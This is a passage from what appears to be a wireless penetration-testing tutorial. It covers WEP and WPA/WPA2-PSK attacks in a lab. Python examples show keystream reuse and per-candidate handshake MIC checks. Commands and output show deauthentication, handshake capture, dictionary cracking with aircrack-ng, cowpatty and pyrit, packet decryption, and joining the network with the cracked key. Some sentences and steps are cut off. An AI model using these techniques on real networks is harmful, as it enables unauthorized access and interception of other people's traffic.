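    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def wep_encrypt(secret_key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """WEP frame body: IV || RC4(IV || secret_key, plaintext).
    The CRC-32 ICV is omitted; it does not affect the keystream argument made here."""
    return iv + rc4(iv + secret_key, plaintext)


def wep_decrypt(secret_key: bytes, frame: bytes) -> bytes:
    iv, body = frame[:3], frame[3:]
    return rc4(iv + secret_key, body)


def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def keystream_reuse_leak(frame1: bytes, frame2: bytes):
    """Two frames with the same IV were encrypted with the same RC4 keystream,
    so XORing their ciphertext bodies cancels the keystream and leaves the XOR
    of the two plaintexts, with no knowledge of the key. Returns None when the
    IVs differ (no keystream reuse between these two frames)."""
    if frame1[:3] != frame2[:3]:
        return None
    return xor_bytes(frame1[3:], frame2[3:])


def iv_collision_probability(frames: int) -> float:
    """Birthday-bound probability that at least one IV repeats among `frames`
    frames sent with uniformly random 24-bit IVs."""
    return 1.0 - math.exp(-frames * (frames - 1) / (2.0 * IV_SPACE))


if __name__ == "__main__":
    key = bytes.fromhex("abcdefabcdefabcdefabcdef12")   # the 128-bit key used in the lab
    iv = b"\x01\x02\x03"                                # constructed IV
    p1, p2 = b"ARP payload one", b"ARP payload two"     # constructed payloads
    f1 = wep_encrypt(key, iv, p1)
    f2 = wep_encrypt(key, iv, p2)
    print("leak equals p1 XOR p2:", keystream_reuse_leak(f1, f2) == xor_bytes(p1, p2))
    print(f"P(IV repeat after 5000 frames) = {iv_collision_probability(5000):.2f}")
```

With 5000 frames the chance of at least one repeated IV already exceeds one half, which is why a busy WEP network, or one into which ARP frames are replayed as above, hands over reusable keystream so quickly. The statistical key-recovery attacks that aircrack-ng applies go further than this example, but they rest on the same per-packet key structure shown here.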





Note that we can also fake an authentication to the access point using the Shared Key Authentication bypass technique we learnt in the last chapter. This can come in handy if the legitimate client leaves the network, as it ensures we can spoof an authentication and association and continue to send our replayed packets into the network.





Have a go hero — fake authentication with WEP cracking 


In the previous exercise, if the legitimate client had suddenly logged off the network, we would not be able to replay the packets, as the access point will not accept packets from unassociated clients.


Your challenge would be to fake an authentication and association using the Shared Key 
Authentication bypass we learnt in the last chapter, while WEP cracking is going on. Log off 
the legitimate client from the network and verify if you are still able to inject packets into the 
network and if the access point accepts and responds to them. 


WPA/WPA2

Both WPA and WPA2 allow for either EAP-based authentication, using RADIUS servers (Enterprise), or a Pre-Shared Key (PSK)-based authentication schema (Personal).


common passphrases. Then, using tools like Aircrack-ng, we can try to crack the WPA/WPA2 PSK passphrase.


An illustration of the four-way handshake is shown in the following figure:

[Figure: exchange between Supplicant and Authenticator, top to bottom: Probe Request-Response, Authentication Request-Response, Association Request-Response; both sides hold the 256-bit Pre-Shared Key; then the EAPOL key exchange, ending with the SNonce, Key Installed and Key Install Acknowledgement messages.]

The way WPA/WPA2 PSK works is that it derives the per-session key, called the Pairwise Transient Key (PTK), using the Pre-Shared Key and five other parameters: the SSID of the network, the Authenticator Nonce (ANonce), the Supplicant Nonce (SNonce), the Authenticator MAC address (access point MAC), and the Supplicant MAC address (Wi-Fi client MAC). This key is then used to encrypt all data between the access point and the client.

An attacker who is eavesdropping on this entire conversation by sniffing the air can get all five parameters mentioned in the previous paragraph.

So how is the Pre-Shared Key created?





In a typical WPA/WPA2 PSK dictionary attack, the attacker would use a large dictionary of possible passphrases with the attack tool. The tool would derive the 256-bit Pre-Shared Key from each of the passphrases and use it with the other parameters described above to create the PTK. The PTK is then used to verify the Message Integrity Check (MIC) in one of the handshake packets. If it matches, then the guessed passphrase from the dictionary was correct; otherwise it was incorrect. Eventually,

the dictionary, it will be identified. This is exactly how WPA/WPA2 PSK cracking works! The following figure illustrates the steps involved:






[Figure: from the 4-Way Handshake, the SNonce and ANonce, together with the AP MAC and Client MAC, are combined with the 256-bit Pre-Shared Key derived from each candidate passphrase to compute the PTK, which is then verified by checking the MIC.]


In the next exercise, we will look at how to crack a WPA-PSK wireless network. The exact same steps are involved in cracking a WPA2-PSK network using CCMP (AES) as well.
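As a worked version of the derivation and of the MIC check described in the two passages above: the 256-bit Pre-Shared Key is PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations) as specified in IEEE 802.11i, the PTK is expanded from it with the two MAC addresses and the two nonces, and the first 128 bits of the PTK (the Key Confirmation Key, KCK) key the handshake MIC. The Python script below is an added example, not code from the book or from the aircrack-ng project. It builds a handshake message 2 for the lab's SSID, AP MAC, client MAC and the passphrase abcdefgh used in the next exercise, with constructed nonces, and then performs the per-candidate check that a dictionary attack performs. The frame layout follows the EAPOL-Key format (MIC field at byte offset 81); the function names are this example's own.

```python
import hashlib
import hmac
import struct

# Handshake parameters. SSID, passphrase, AP MAC and client MAC are the lab
# values from this chapter; the two nonces are constructed for the example.
SSID = "Wireless Lab"
AP_MAC = bytes.fromhex("002191D28E25")
CLIENT_MAC = bytes.fromhex("60FB42D5E401")
ANONCE = bytes(range(0, 32))        # constructed Authenticator nonce
SNONCE = bytes(range(32, 64))       # constructed Supplicant nonce

MIC_OFFSET = 81     # byte offset of the Key MIC field inside an EAPOL-Key frame
MIC_LEN = 16


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """802.11i: the 256-bit Pre-Shared Key (PMK) is PBKDF2-HMAC-SHA1 over the
    passphrase, salted with the SSID, 4096 iterations."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def derive_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes,
               nbytes: int = 64) -> bytes:
    """PTK = PRF-512(PMK, "Pairwise key expansion", min(AA,SPA) || max(AA,SPA)
    || min(ANonce,SNonce) || max(ANonce,SNonce)). The first 16 bytes are the
    Key Confirmation Key (KCK) that protects the handshake MIC."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    label = b"Pairwise key expansion"
    out = b""
    counter = 0
    while len(out) < nbytes:
        out += hmac.new(pmk, label + b"\x00" + data + bytes([counter]), hashlib.sha1).digest()
        counter += 1
    return out[:nbytes]


def eapol_mic(kck: bytes, frame: bytes, key_descriptor_version: int) -> bytes:
    """MIC over the whole EAPOL-Key frame with the MIC field zeroed: HMAC-MD5 for
    key descriptor version 1 (WPA/TKIP), HMAC-SHA1-128 for version 2 (CCMP)."""
    zeroed = frame[:MIC_OFFSET] + b"\x00" * MIC_LEN + frame[MIC_OFFSET + MIC_LEN:]
    digest = hashlib.md5 if key_descriptor_version == 1 else hashlib.sha1
    return hmac.new(kck, zeroed, digest).digest()[:MIC_LEN]


def build_message2(kck: bytes, snonce: bytes, key_descriptor_version: int = 1) -> bytes:
    """Construct the second handshake message (supplicant -> authenticator) as the
    supplicant would: SNonce plus a MIC keyed with the KCK. Key data is left empty."""
    key_info = 0x0100 | key_descriptor_version          # Pairwise bit + version
    descriptor_type = 0xFE if key_descriptor_version == 1 else 0x02
    body = (bytes([descriptor_type])
            + struct.pack(">HHQ", key_info, 0, 1)      # key info, key length, replay counter
            + snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8   # nonce, IV, RSC, key ID
            + b"\x00" * MIC_LEN                        # MIC placeholder
            + struct.pack(">H", 0))                    # key data length
    frame = struct.pack(">BBH", 1, 3, len(body)) + body  # 802.1X version 1, type Key (3)
    mic = eapol_mic(kck, frame, key_descriptor_version)
    return frame[:MIC_OFFSET] + mic + frame[MIC_OFFSET + MIC_LEN:]


def passphrase_matches(candidate: str, frame: bytes, ssid: str = SSID,
                       aa: bytes = AP_MAC, spa: bytes = CLIENT_MAC,
                       anonce: bytes = ANONCE, snonce: bytes = SNONCE) -> bool:
    """The check a dictionary attack performs per candidate: passphrase -> PMK ->
    PTK -> KCK, then recompute the MIC and compare it with the captured one."""
    version = struct.unpack(">H", frame[5:7])[0] & 0x7
    kck = derive_ptk(derive_pmk(candidate, ssid), aa, spa, anonce, snonce)[:16]
    return hmac.compare_digest(eapol_mic(kck, frame, version),
                               frame[MIC_OFFSET:MIC_OFFSET + MIC_LEN])


def audit_passphrase(candidates, frame: bytes):
    """Return the first candidate whose MIC matches the captured frame, else None."""
    for candidate in candidates:
        if passphrase_matches(candidate, frame):
            return candidate
    return None


if __name__ == "__main__":
    real_kck = derive_ptk(derive_pmk("abcdefgh", SSID), AP_MAC, CLIENT_MAC, ANONCE, SNONCE)[:16]
    captured = build_message2(real_kck, SNONCE)
    print(audit_passphrase(["password", "12345678", "abcdefgh"], captured))   # abcdefgh
```

Each candidate costs one PBKDF2 derivation (4096 HMAC-SHA1 iterations), and because the SSID is the salt, that work cannot be shared across networks; this per-guess cost is the only thing standing between a captured handshake and the passphrase, so the strength of the passphrase is what actually protects a PSK network.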


Time for action — cracking WPA-PSK weak passphrase


Follow the given instructions to get started: 


1. Let us first connect to our access point Wireless Lab and set the access point to use 
WPA-PSK. We will set the WPA-PSK passphrase to abcdefgh, so that it is vulnerable 
to a dictionary attack: 


[Screenshot: the WIRELESS SETTINGS page (Enable Wireless: Always; Wireless Network Name: Wireless Lab (Also called the SSID); 802.11 Mode: Mixed 802.11n, 802.11g and 802.11b; Wireless Channel: 2.462 GHz - CH 11; Transmission Rate: Best (automatic) (Mbit/s); Channel Width: 20 MHz) with WIRELESS SECURITY MODE set to WPA-Personal: WPA Mode: WPA Only; Cipher Type: TKIP; Group Key Update Interval: 3600 (seconds); PRE-SHARED KEY entered (masked). The router's help text reads:]

Use WPA or WPA2 mode to achieve a balance of strong security and best compatibility. This mode uses WPA for legacy clients while maintaining higher security with stations that are WPA2 capable. Also the strongest cipher that the client supports will be used. For best security, use WPA2 Only mode. This mode uses AES(CCMP) cipher and legacy stations are not allowed access with WPA security. For maximum compatibility, use WPA Only. This mode uses TKIP cipher. Some gaming and legacy devices work only in this mode.

To achieve better wireless performance use WPA2 Only security mode (or in other words AES cipher).

Enter an 8- to 63-character alphanumeric pass-phrase. For good security it should be of ample length and should not be a commonly known phrase.
2. We start airodump-ng with the command airodump-ng --bssid 00:21:91:D2:8E:25 --channel 11 --write WPACrackingDemo mon0, so that it starts capturing and storing all packets for our network:





 CH 11 ][ Elapsed: 0 s ][ 2011-02-06 03:31

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
 00:21:91:D2:8E:25  -19  83       27        0    0  11  54.  WEP  WEP         Wireless Lab

 BSSID              STATION            PWR   Rate    Lost  Packets  Probes

root@bt:~# aireplay-ng --deauth 1 -a 00:21:91:D2:8e:25 mon0
07:29:09  Waiting for beacon frame (BSSID: 00:21:91:D2:8E:25) on channel 11
NB: this attack is more effective when targeting
a connected wireless client (-c <client's mac>).
07:29:09  Sending DeAuth to broadcast -- BSSID: [00:21:91:D2:8E:25]
root@bt:~#

 CH 11 ][ Elapsed: 11 mins ][ 2011-02-06 07:17 ][ WPA handshake: 00:21:91:D2:8E:25

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
 00:21:91:D2:8E:25  -22  96     6116     1709    1  11  54e. WPA  TKIP   PSK  Wireless Lab

 BSSID              STATION            PWR   Rate    Lost  Packets  Probes
 00:21:91:D2:8E:25  60:FB:42:D5:E4:01   -9    0 -54e     8       40  Wireless Lab
5. We can stop airodump-ng now. Let's open up the cap file in Wireshark and view the four-way handshake. Your Wireshark terminal should look like the following screenshot. I have selected the first packet of the four-way handshake in the trace file, in the following screenshot. The handshake packets are the ones whose protocol is EAPOL Key:





[Wireshark screenshot of the capture file: after the Association Request and Association Response between IntelCor_35:fc:44 and D-Link_d2:8e:25 (each followed by an IEEE 802 Acknowledgement), four EAPOL Key frames alternate between D-Link_d2:8e:25 and IntelCor_35:fc:44, followed by QoS Data frames. The first handshake frame is selected (133 bytes on wire): IEEE 802.11 QoS Data; Logical-Link Control; 802.1X Authentication: Version: 1, Type: Key (3), Descriptor Type: EAPOL WPA key (254), Key Length: 32, a Replay Counter, a Nonce, an all-zero Key IV, WPA Key RSC, WPA Key ID and WPA Key MIC, WPA Key Length: 0.]





6. Now we will start the actual key cracking exercise! For this, we need a dictionary of common words. BackTrack ships with a dictionary file darkc0de.lst located as shown in the following screenshot. It is important to note that in WPA cracking you are only as good as your dictionary. BackTrack ships with some dictionaries, but these may be insufficient. The passwords people choose depend on a lot of things, including which country the users belong to, common names and phrases in that region, the security awareness of the users, and a host of other factors. It may be a good idea to aggregate country- and region-specific word lists when going out for a penetration test:

root@bt: ~ - Shell - Konsole <3>
root@bt:~# ls /pentest/passwords/wordlists/darkc0de.lst
/pentest/passwords/wordlists/darkc0de.lst
root@bt:~#
7. We will now invoke aircrack-ng with the pcap file as input and a link to the

root@bt: ~ - Shell - Konsole <2>
root@bt:~# aircrack-ng WPACrackingDemo-01.cap -w /pentest/passwords/wordlists/darkc0de.lst
8. Aircrack-ng uses the dictionary file to try various combinations of passphrases and tries to crack the key. Your screen will look similar to the one in the screenshot:

root@bt: ~ - Shell - Konsole <2>
Aircrack-ng 1.0 r1645
[00:00:00] 176 keys tested (382.44 k/s)
KEY FOUND! [ abcdefgh ]
Master Key     : A4
                 9A
Transient Key  : 5C
                 4C
                 3A
                 12
EAPOL HMAC     : CD
root@bt:~#
[Only the first byte of each key line is legible in the screenshot.]
9. Please note that, as this is a dictionary attack, the prerequisite is that the passphrase must be present in the dictionary file you are supplying to aircrack-ng. If the passphrase is not present in the dictionary, the attack will fail!

What just happened?
We set up WPA-PSK on our access point with a common passphrase abcdefgh. We then used a de-authentication attack to make legitimate clients reconnect to the access point. When they reconnect, we capture the four-way WPA handshake between the access point and the client.

As WPA-PSK is vulnerable to a dictionary attack, we feed the capture file containing the WPA four-way handshake and a list of common passphrases (in the form of a wordlist) to aircrack-ng. As the passphrase abcdefgh is present in the wordlist, aircrack-ng is able to crack the WPA-PSK shared passphrase. It is very important to note again that in WPA dictionary-based cracking, you are only as good as the dictionary you have. Thus, it is important to compile a large and elaborate dictionary before you begin. Though BackTrack ships with its own dictionary, it may be insufficient at times and need more words, especially given the localization factor.


Have a go hero - trying WPA-PSK cracking with Cowpatty

Cowpatty is a tool which can also crack a WPA-PSK passphrase using a dictionary attack. This tool is included with BackTrack. I leave it as an exercise for you to use Cowpatty to crack the WPA-PSK passphrase.

Also, try setting an uncommon passphrase, not present in the dictionary, and try the attack again. You will now be unsuccessful in cracking the passphrase with both aircrack-ng and Cowpatty.

It is important to note that the same attack applies even to a WPA2 PSK network. I would encourage you to verify this independently.


Speeding up WPA/WPA2 PSK cracking


We have already seen in the previous section that if we have the correct passphrase in our dictionary, cracking WPA-Personal will work every time like a charm. So why don't we just create a large, elaborate dictionary of millions of common passwords and phrases people use? This would help us a lot and, most of the time, we would end up cracking the passphrase. It all sounds great, but we are missing one key component here: the time taken. One of the more CPU- and time-consuming calculations is that of the Pre-Shared Key from the PSK passphrase and the SSID through PBKDF2. This function hashes the combination of both over 4,096 times before outputting the 256-bit Pre-Shared Key. The next step of cracking involves using this key along with parameters in the four-way handshake and verifying against the MIC in the handshake. This step is computationally inexpensive. Also, the parameters in the handshake vary every time, and hence this step cannot be pre-computed. Thus, to speed up the cracking process, we need to make the calculation of the Pre-Shared Key from the passphrase as fast as possible.
Key (PMK) in the 802.11 standard parlance. It is important to note that, as the SSID is also used to calculate the PMK, with the same passphrase but a different SSID we would end up with a different PMK. Thus, the PMK depends on both the passphrase and the SSID.
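To make the cost argument above concrete, here is an added example (my code, not the book's and not part of aircrack-ng, Cowpatty or genpmk) that performs the PBKDF2 step with Python's hashlib, checks it against the known-answer vector published in the IEEE 802.11i standard (passphrase "password" with SSID "IEEE"), shows that the same passphrase gives a different PMK under a different SSID, and turns a derivation rate into the time needed to exhaust a wordlist. The wordlist sizes and rates used in the demo are the figures from the aircrack-ng and Cowpatty runs later in this section; the function names and the second SSID "Wireless Lab 2" are assumptions of the example. The handshake-verification step (PTK and MIC) is deliberately not included.

```python
"""Added example (not from the book): the PBKDF2 step that makes WPA/WPA2-PSK
dictionary attacks slow, and why a pre-computed PMK is tied to one SSID."""
import hashlib
import time

PBKDF2_ROUNDS = 4096   # iteration count fixed by IEEE 802.11i for WPA/WPA2-PSK
PMK_LEN = 32           # the PMK is 256 bits

# Known-answer vector from the IEEE 802.11i standard (Annex H): passphrase
# "password" with SSID "IEEE" must give exactly this PMK.
KAT_PASSPHRASE, KAT_SSID = "password", "IEEE"
KAT_PMK = bytes.fromhex(
    "f42c6fc52df0ebef9ebb4b90b38a5f902e83fe1b135a70e23aed762e9710a12e")


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, salt=SSID, 4096 rounds, 256 bits)."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("WPA-PSK passphrases are 8 to 63 characters")
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode("utf-8"),
                               ssid.encode("utf-8"), PBKDF2_ROUNDS, PMK_LEN)


def pmk_depends_on_ssid(passphrase: str, ssid_a: str, ssid_b: str) -> bool:
    """True when the same passphrase yields different PMKs for two SSIDs."""
    return derive_pmk(passphrase, ssid_a) != derive_pmk(passphrase, ssid_b)


def measure_pmk_rate(seconds: float = 0.5) -> float:
    """Single-core PMK derivations per second on this machine (timing only;
    the passphrases used here are throwaway values, not a wordlist)."""
    count, start = 0, time.perf_counter()
    while time.perf_counter() - start < seconds:
        derive_pmk("measurement-only-%d" % count, "Wireless Lab")
        count += 1
    return count / (time.perf_counter() - start)


def seconds_to_exhaust(wordlist_size: int, rate_per_second: float) -> float:
    """Time to try every passphrase in a wordlist at a given PMK rate."""
    return wordlist_size / rate_per_second


if __name__ == "__main__":
    assert derive_pmk(KAT_PASSPHRASE, KAT_SSID) == KAT_PMK
    print("IEEE 802.11i known-answer test passed")
    print("Same passphrase, different SSID, different PMK:",
          pmk_depends_on_ssid("abcdefgh", "Wireless Lab", "Wireless Lab 2"))
    rate = measure_pmk_rate()
    print(f"This machine: about {rate:.0f} PMKs/s on one core")
    # Figures from the runs in this section: aircrack-ng tested 979604 keys at
    # 720.76 k/s, Cowpatty with pre-computed PMKs ran at 144839.60 per second.
    print(f"979604 keys at 720.76 k/s: {seconds_to_exhaust(979604, 720.76) / 60:.1f} min")
    print(f"1040000 pre-computed PMKs at 144839.60/s: "
          f"{seconds_to_exhaust(1040000, 144839.60):.1f} s")
```

Because the SSID is the PBKDF2 salt, a table of pre-computed PMKs (what genpmk builds) is only useful against the one SSID it was built for; from the defender's side, an uncommon SSID and a long random passphrase are the two settings that make both the on-the-fly and the pre-computed variants of this attack impractical.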







In the next exercise, we will look at how to pre-calculate the PMK and use it for WPA/WPA2 
PSK cracking. 





Time for action — speeding up the cracking process 


1. We can pre-calculate the PMK for a given SSID and wordlist using the genpmk tool with the command genpmk -f /pentest/passwords/wordlists/darkc0de.lst -d PMK-Wireless-Lab -s "Wireless Lab" as shown in the following screenshot. This creates the file PMK-Wireless-Lab that contains the pre-generated PMKs:

root@bt:~# genpmk -f /pentest/passwords/wordlists/darkc0de.lst -d PMK-Wireless-Lab -s "Wireless Lab"
genpmk 1.1 - WPA-PSK precomputation attack. <jwright@hasborg.com>
File PMK-Wireless-Lab does not exist, creating.
key no. N: 012ih00n
key no. N: 070mi714n
key no. N: 0d0n746124
key no. N: 0pini0n47iv3n355
key no. N: 0v312121i07
key no. N: 0v312bu9
key no. N: 0vi6312m
key no. N: 1 ARSENIAN
key no. N: 1 BEVERLE
key no. N: 1 BUDROS
key no. N: CIAGLO
key no. N: DELLER
key no. N: ELSBERND
key no. N: FUMAGALLI
key no. N: GROENSTEIN
key no. N: HESSELGREN
key no. N: JONATHON
key no. N: KOJNOK
key no. N: LESKAR
key no. N: MARIJKE
key no. N: MISSIMER
key no. N: NOGALES
key no. N: PETCHY
[genpmk prints one progress line per batch of passphrases; the counts (N) are not legible in the screenshot.]
2. We now create a WPA-PSK network with the passphrase sky sign (present in the dictionary we used) and capture a WPA handshake for that network. We now use Cowpatty to crack the WPA passphrase as shown in the following screenshot:

root@bt:~# cowpatty -d PMK-Wireless-Lab -s "Wireless Lab" -r WPACrackingDemo2-01.cap
cowpatty 4.6 - WPA-PSK dictionary attack. <jwright@hasborg.com>

Collected all necessary data to mount crack against WPA/PSK passphrase.
Starting dictionary attack.  Please be patient.
key no. 10000: 1 BUDROS
key no. 20000: 1 MARIJKE
key no. 30000: 1 ZAHRAH
key no. 40000: 12h9nch0p5
key no. 50000: 11191776127
key no. 60000: 3 SALOMON
key no. 70000: 4110m012phi5m
key no. 80000: 4n4p707ic
key no. 90000: 53p4124b13
key no. 100000: 5inklik3
key no. 110000: 6141231355
key no. 120000: 73n3b12i0nid
key no. 130000: Alice Duer
key no. 140000: Bengal rose
key no. 150000: Campbell's
key no. 160000: DAVE PEABOY
key no. 170000: Euphrates
key no. 180000: Goodarzi
key no. 190000: IMPORTANT
key no. 200000: Kleanthes
key no. 210000: MARK KING
key no. 220000: Motorhead
key no. 230000: PRO-200\6
key no. 240000: RON AFFIF
key no. 250000: Scarborough
key no. 260000: Susanvictoria
3. It takes approximately 7.18 seconds for Cowpatty to crack the key using the pre-calculated PMKs, as shown in the screenshot:

key no. 780000: minet-rdm-mil-tac
key no. 790000: mortify
key no. 800000: n0nm47h3m47ici4n
key no. 810000: newparis
key no. 820000: obererei
key no. 830000: onkuisheid
key no. 840000: ossequiosi
key no. 850000: p123d374chm3n7
key no. 860000: p53ud6n9munc13
key no. 870000: passeque
key no. 880000: persecutusque
key no. 890000: pinking iron
key no. 900000: portenderatisque
key no. 910000: presentandoli
key no. 920000: prosperous
key no. 930000: quarter-phase
key no. 940000: rasentato
key no. 950000: reguleerbare
key no. 960000: rhapsodies
key no. 970000: rimescolati
key no. 980000: rivet heater
key no. 990000: sail packet
key no. 1000000: scalerebbe
key no. 1010000: scredita
key no. 1020000: sentence structure
key no. 1030000: shemgang
key no. 1040000: sky sign

The PSK is "sky sign".

1040000 passphrases tested in 7.18 seconds:  144839.60 passphrases/second
root@bt:~#
4. We now use aircrack-ng with the same dictionary file and the cracking process takes over 22 minutes. This shows how much we are gaining because of the pre-calculation:

root@bt: ~ - Shell - Konsole
Aircrack-ng 1.1 r1738
[00:22:35] 979604 keys tested (720.76 k/s)
KEY FOUND! [ sky sign ]
Master Key     : F7 D6 17 A0 04
                 76 4E A3 71 23
Transient Key  : AF 1E FB 44 EB
                 C1 AC 98 9C AD
                 13 38 61 9A 33
                 7B 52 6F D9 42
EAPOL HMAC     : E5 68 7B D7 B7
root@bt:~#
[Only part of each key line is legible in the screenshot.]
5. In order to use these PMKs with aircrack-ng, we need to use a tool called airolib-ng. We will give it the options airolib-ng PMK-Aircrack --import cowpatty PMK-Wireless-Lab, where PMK-Aircrack is the aircrack-ng compatible database to be created and PMK-Wireless-Lab is the genpmk compliant PMK database, which we had created previously:

root@bt: ~ - Shell No. 2 - Konsole
root@bt:~# airolib-ng PMK-Aircrack --import cowpatty PMK-Wireless-Lab
Database <PMK-Aircrack> does not already exist, creating it...
Database <PMK-Aircrack> successfully created
Reading header...
Reading...
Updating references...
6. We now feed this database to aircrack-ng and the cracking process speeds up remarkably. The command we use is aircrack-ng -r PMK-Aircrack WPACrackingDemo2-01.cap:

root@bt: ~ - Shell No. 2 - Konsole
Aircrack-ng 1.1 r1738
[00:00:26] 1039995 keys tested (39519.65 k/s)
KEY FOUND! [ sky sign ]
Master Key     : E1 F7 D6 17 2C 8C AA A0 04
                 BF 76 4E A3 CF 7F 48 71 23
Transient Key  : C8 AF 1E FB 30 7F 7D 44 EB
                 72 C1 AC 98 5D 40 9C 9C AD
                 BB 13 38 61 F0 D3 BE 9A 33
                 8C 7B 52 6F 2E B0 D4 D9 42
EAPOL HMAC     : 5C E5 68 7B 1C 2F 5C D7 B7
Quitting aircrack-ng...
root@bt:~#
[Only part of each key line is legible in the screenshot.]
7. There are other tools available on BackTrack, like Pyrit, that can leverage multi-CPU systems to speed up cracking. We give the pcap filename with the -r option and the genpmk compliant PMK file with the -i option. Even on the same system used with the previous tools, Pyrit takes around three seconds to crack the key, using the same PMK file created with genpmk, as shown in the following screenshot:

root@bt: ~ - Shell No. 2 - Konsole
root@bt:~# pyrit -r WPACrackingDemo2-01.cap -i PMK-Wireless-Lab attack_cowpatty
Pyrit 0.3.1-dev (svn r280) (C) 2008-2010 Lukas Lueg http://pyrit.googlecode.com
This code is distributed under the GNU General Public License v3+

Parsing file 'WPACrackingDemo2-01.cap' (1/1)...
Parsed 10 packets (10 802.11-packets), got 1 AP(s)

Picked AccessPoint 00:21:91:d2:8e:25 automatically...
Tried 0 PMKs so far; 0 PMKs per second.
Tried 1179380 PMKs so far; 452746 PMKs per second.

The password is 'sky sign'.

root@bt:~#
We looked at various tools and techniques to speed up WPA/WPA2-PSK cracking. The whole idea is to pre-calculate the PMK for a given SSID and the list of passphrases in our dictionary.

Decrypting WEP and WPA packets

In all the exercises we have done till now, we have cracked WEP and WPA keys using various techniques. But what do we do with this information? The first step would be to decrypt the data packets we have captured, using these keys.

In the next exercise, we will decrypt the WEP and WPA packets in the same trace file that we captured over the air, using the keys we cracked.





Time for action — decrypting WEP and WPA packets 


1. We will decrypt packets from the same WEP capture file we created earlier, WEPCrackingDemo-01.cap. For this, we will use another tool in the Aircrack-ng suite called airdecap-ng. We run the following command, as shown in the following screenshot, using the WEP key we cracked previously: airdecap-ng -w abcdefabcdefabcdefabcdef12 WEPCrackingDemo-01.cap:

root@bt: ~ - Shell No. 2 - Konsole
root@bt:~# airdecap-ng -w abcdefabcdefabcdefabcdef12 WEPCrackingDemo-01.cap
Total number of packets read          7171
Total number of WEP data packets      4368
Total number of WPA data packets         0
Number of plaintext data packets         0
Number of decrypted WEP packets       4368
Number of corrupted WEP packets          0
Number of decrypted WPA packets          0
root@bt:~#
2. The decrypted packets are stored in a file named WEPCrackingDemo-01-dec.cap. We use the tshark utility to view the first ten packets in the file. Please note that you may see something different based on what you captured:

root@bt: ~ - Shell - Konsole
root@bt:~# tshark -r WEPCrackingDemo-01-dec.cap -c 10
Running as user "root" and group "root". This could be dangerous.
  1   0.000000 D-Link_d2:8e:25 -> Broadcast    ARP Who has 192.168.0.198?  Tell 192.168.0.1
  2   0.003657 192.168.0.198 -> 192.168.0.1  ICMP Echo (ping) request (id=0x2413, seq(be/le)=1/256,
  3   0.003657 Alfa_3e:bd:93 -> D-Link_d2:8e:25 ARP 192.168.0.198 is at 00:c0:ca:3e:bd:93
  4   0.004662 192.168.0.1 -> 192.168.0.198 ICMP Echo (ping) reply (id=0x2413, seq(be/le)=1/256, ttl=64)
  5   0.008757 192.168.0.1 -> 192.168.0.198 ICMP Echo (ping) reply (id=0x2413, seq(be/le)=2/512, ttl=64)
  6   0.012854 192.168.0.1 -> 192.168.0.198 ICMP Echo (ping) reply (id=0x2413, seq(be/le)=3/768, ttl=64)
  7   0.013897 192.168.0.198 -> 192.168.0.1  ICMP Echo (ping) request (id=0x2413, seq(be/le)=2/512, ttl=64)
  8   0.013897 192.168.0.198 -> 192.168.0.1  ICMP Echo (ping) request (id=0x2413, seq(be/le)=3/768, ttl=64)
  9   0.017973 192.168.0.1 -> 192.168.0.198 ICMP Echo (ping) reply (id=0x2413, seq(be/le)=4/1024, ttl=64)
 10   0.022069 192.168.0.1 -> 192.168.0.198 ICMP Echo (ping) reply (id=0x2413, seq(be/le)=5/1280, ttl=64)
root@bt:~#
3. WPA/WPA2 PSK works in exactly the same way as WEP with the airdecap-ng utility, as shown in the following figure, using the command airdecap-ng -p abcdefgh WPACrackingDemo-01.cap -e "Wireless Lab":

root@bt: ~ - Shell - Konsole
root@bt:~# airdecap-ng -p abcdefgh WPACrackingDemo-01.cap -e "Wireless Lab"
Total number of packets read          4633
Total number of WEP data packets         0
Total number of WPA data packets      2896
Number of plaintext data packets
Number of decrypted WEP packets
Number of corrupted WEP packets
Number of decrypted WPA packets
root@bt:~#
[The last four counters are not legible in the screenshot.]
What just happened?

We just saw how we can decrypt WEP and WPA/WPA2-PSK encrypted packets using airdecap-ng. It is interesting to note that we can do the same using Wireshark. We would encourage you to explore how this can be done by consulting the Wireshark documentation.

We can also connect to the authorized network after we have cracked the network key. This can come in handy during penetration testing. Logging onto the authorized network with the cracked key is the ultimate proof you can provide your client that their network is insecure.


Time for action - connecting to a WEP network 





1. Use the iwconfig utility to connect to a WEP network, once you have the key. In a past exercise, we broke the WEP key abcdefabcdefabcdefabcdef12:

root@bt: ~ - Shell - Konsole
root@bt:~# iwconfig wlan0 essid "Wireless Lab" key abcdefabcdefabcdefabcdef12
root@bt:~#
root@bt:~# iwconfig wlan0
wlan0     IEEE 802.11bg  ESSID:"Wireless Lab"
          Mode:Managed  Frequency:2.412 GHz  Access Point: 00:21:91:D2:8E:25
          Bit Rate=1 Mb/s   Tx-Power=20 dBm
          Retry  long limit:7   RTS thr:off   Fragment thr:off
          Encryption key:ABCD-EFAB-CDEF-ABCD-EFAB-CDEF-12
          Power Management:off
          Link Quality=70/70  Signal level=-20 dBm
          Rx invalid nwid:0  Rx invalid crypt:0  Rx invalid frag:0
          Tx excessive retries:0  Invalid misc:0   Missed beacon:0
root@bt:~#

What just happened?

We saw how to connect to a WEP network.
Time for action - connecting to a WPA network

